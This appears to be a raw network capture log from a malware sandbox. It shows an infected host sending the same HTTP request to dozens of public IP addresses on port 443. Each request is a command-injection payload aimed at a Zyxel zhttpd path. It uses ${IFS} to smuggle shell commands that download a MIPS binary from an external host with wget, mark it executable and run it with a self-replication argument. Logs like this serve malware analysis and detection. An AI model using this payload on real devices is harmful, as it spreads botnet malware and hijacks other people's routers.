                                          Jan 14, 2024 15:46:23.128191948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5898192.168.2.2343794209.235.131.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128211021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5899192.168.2.2333920155.95.214.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128243923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5900192.168.2.2355706156.184.226.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128309011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5901192.168.2.2355928142.67.49.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128333092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5902192.168.2.2347696128.171.134.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128350019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5903192.168.2.234679078.218.47.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128371954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5904192.168.2.2353610193.192.8.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128396988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5905192.168.2.234371468.51.155.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128408909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5906192.168.2.234577031.3.191.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128438950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5907192.168.2.235861881.201.155.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128459930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5908192.168.2.235091094.247.236.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128473997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5909192.168.2.234598062.22.154.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128479958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5910192.168.2.2341402205.76.76.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128496885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5911192.168.2.2344936137.74.148.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128518105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5912192.168.2.2355040213.22.220.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128555059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5913192.168.2.233709457.218.93.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128608942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5914192.168.2.234088423.61.242.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128638029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5915192.168.2.235427670.133.94.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128649950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5916192.168.2.2357402185.16.135.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128695011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5917192.168.2.2352590210.157.57.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128696918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5918192.168.2.23352622.119.68.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128722906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5919192.168.2.2339122137.152.217.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128752947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5920192.168.2.234299476.19.249.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128789902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5921192.168.2.2337552168.22.79.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128834009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5922192.168.2.234337087.106.47.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128870964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5923192.168.2.234828054.36.157.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128921032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5924192.168.2.235668054.37.216.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128947020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5925192.168.2.234738449.141.228.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128962994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5926192.168.2.2354320144.108.177.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128993034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5927192.168.2.234155848.228.13.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129026890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5928192.168.2.233312692.95.187.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129043102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5929192.168.2.235515617.176.172.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129069090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5930192.168.2.2353438144.117.114.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129086971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5931192.168.2.2337096191.249.36.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129126072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5932192.168.2.2336224199.228.183.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129156113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5933192.168.2.2347834163.34.239.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129167080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5934192.168.2.2346610174.30.7.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129195929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5935192.168.2.234526063.130.251.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129226923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5936192.168.2.2343592181.156.104.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129282951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5937192.168.2.2350730166.151.186.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129292965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5938192.168.2.2350180136.98.214.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129327059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5939192.168.2.2347286111.123.76.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129376888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5940192.168.2.2357080145.35.220.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129394054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5941192.168.2.2339582104.180.101.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129417896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5942192.168.2.2342084110.41.185.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129416943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5943192.168.2.2333376160.207.28.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129451036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5944192.168.2.2333620137.10.86.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129484892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5945192.168.2.2343080197.233.85.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129509926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5946192.168.2.234464240.45.172.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129537106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5947192.168.2.2341106117.123.53.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129563093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5948192.168.2.2337982173.103.151.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129569054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5949192.168.2.2339942212.93.138.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129591942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5950192.168.2.2354562121.39.139.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129616976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5951192.168.2.235562025.185.212.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129658937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5952192.168.2.2332820222.106.171.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129682064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5953192.168.2.235426454.233.212.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129709959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5954192.168.2.233752023.164.12.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129755974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5955192.168.2.235750650.20.124.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129779100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5956192.168.2.235357259.224.18.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129802942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5957192.168.2.235323680.228.30.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129827976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5958192.168.2.2360292110.33.228.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129865885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5959192.168.2.2349718150.111.100.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129880905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5960192.168.2.235614678.202.210.226443
                                          TimestampBytes transferredDirectionData
